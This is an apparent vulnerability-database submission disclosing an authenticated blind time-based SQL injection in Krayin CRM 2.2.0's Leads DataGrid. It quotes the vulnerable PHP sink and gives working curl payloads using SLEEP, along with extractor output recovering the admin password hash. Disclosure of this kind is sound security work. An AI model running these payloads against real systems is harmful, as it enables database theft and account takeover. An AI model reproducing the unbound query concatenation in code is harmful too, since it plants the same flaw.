Submit #831573: Webkul Krayin CRM 2.2.0 SQL Injectioninfo

Title	Webkul Krayin CRM 2.2.0 SQL Injection
Description	Krayin CRM 2.2.0 contains an authenticated blind time-based SQL injection in the Leads DataGrid. The `rotten_lead[in]` request parameter is concatenated directly into a `havingRaw()` expression without parameter binding, exposing the database to byte-by-byte extraction by any authenticated staff user — including the lowest-privilege Sales Rep role. The most impactful target row is the bcrypt password hash of the primary admin account, recoverable in roughly fifteen minutes against a localhost install. The sink is `packages/Webkul/Admin/src/DataGrids/Lead/LeadDataGrid.php`, line 89-91: ```php if (! is_null(request()->input('rotten_lead.in'))) { $queryBuilder->havingRaw( $tablePrefix.'rotten_lead = '.request()->input('rotten_lead.in') ); } ``` `rotten_lead[in]` is concatenated directly into `HAVING` with no binding and no type coercion. The endpoint is reachable as any authenticated admin-panel user at `GET /admin/leads` with `X-Requested-With: XMLHttpRequest`, which routes `LeadController::index()` (line 66) to `datagrid(LeadDataGrid::class)->process()`. There is no role-level gate on this specific filter beyond the standard Bouncer "user" middleware, so the lowest-privilege staff role reaches the sink. ## Reproduction Verified live on a stock Krayin 2.2.0 Docker install, authenticated as a non-admin Sales Rep with five leads visible to the session. Baseline: ```bash time curl -sS -b "$JAR" -H "X-Requested-With: XMLHttpRequest" -o /dev/null \ "http://target/admin/leads?pipeline_id=1&rotten_lead%5Bin%5D=1" # real 0m0.028s ``` Time-based oracle (`SLEEP(2)` × five matched rows = ~10s): ```bash time curl -sS -b "$JAR" -H "X-Requested-With: XMLHttpRequest" -o /dev/null \ "http://target/admin/leads?pipeline_id=1&rotten_lead%5Bin%5D=1%20OR%20SLEEP(2)" # real 0m10.024s ``` A binary-search extractor recovers the admin bcrypt hash byte-by-byte: ``` [+] calibrating oracle baseline=0.01s sleep_payload=3.02s [+] extracting: SELECT password FROM users WHERE id=1 LIMIT 1 [01] '$' so far: $ [02] '2' so far: $2 ... [60] '.' so far: $2y$10$TOUeqljAUhpipQJOn2aGg... ```
Source	⚠️ https://bytium.com/insights/krayin-crm-2-2-0-authenticated-blind-sql-injection-in-leads-datagrid
User	suffer (UID 74855)
Submission	05/16/2026 16:36 (30 days ago)
Moderation	06/14/2026 13:58 (29 days later)
Status	Duplicate
VulDB entry	357342 [Krayin CRM 2.2.x /Lead/LeadDataGrid.php rotten_lead sql injection]
Points	0

◂ Previous Overview Next ▸

Want to know what is going to be exploited?

We predict KEV entries!